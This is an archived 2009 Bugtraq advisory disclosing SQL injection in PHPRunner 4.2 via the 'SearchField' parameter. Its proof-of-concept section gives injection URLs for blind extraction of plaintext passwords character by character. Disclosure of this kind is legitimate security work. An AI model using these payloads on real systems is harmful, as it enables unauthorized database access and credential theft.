lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20090317140537.jujqxhg4aoowwswc@mail.amnpardaz.com>
Date: Tue, 17 Mar 2009 14:05:37 +0330
From: admin@...report.ir
To: bugtraq@...urityfocus.com
Subject: PHPRunner SQL Injection

##########################www.BugReport.ir########################################
#
#        AmnPardaz Security Research Team
#
# Title:		PHPRunner SQL Injection
# Vendor:		http://www.xlinesoft.com
# Vulnerable Version:	4.2 (prior versions also may be affected)
# Exploitation:		Remote with browser
# Original Advisory:	http://www.bugreport.ir/index_63.htm
# Fix:			N/A
###################################################################################

####################
- Description:
####################

PHPRunner builds visually appealing web interface for popular  
databases. Your web site visitors will be able to easily search, add,  
edit, delete and exprt

data in MySQL, Oracle, SQL Server, MS Access, and Postgre databases.

####################
- Vulnerability:
####################

Input passed to the "SearchField" parameters in "UserView_list.php" is  
not properly sanitised before being used in SQL queries.
This can be exploited to manipulate SQL queries by injecting arbitrary  
SQL code.

Vulnerable Pages: 'orders_list.php' , 'users_list.php' ,  
'Administrator_list.php'


####################
- PoC:
####################

Its possible to obtain plain text passwords from database by blind  
fishing exploit

http://example.com/output/UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=Password like  
'%%')--
http://example.com/output/UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=mid(Password,1,1)='a')--
http://example.com/output/UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=mid(Password,1,2)='ab')--

####################
- Solution:
####################

Edit the source code to ensure that inputs are properly sanitized.


####################
- Credit:
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ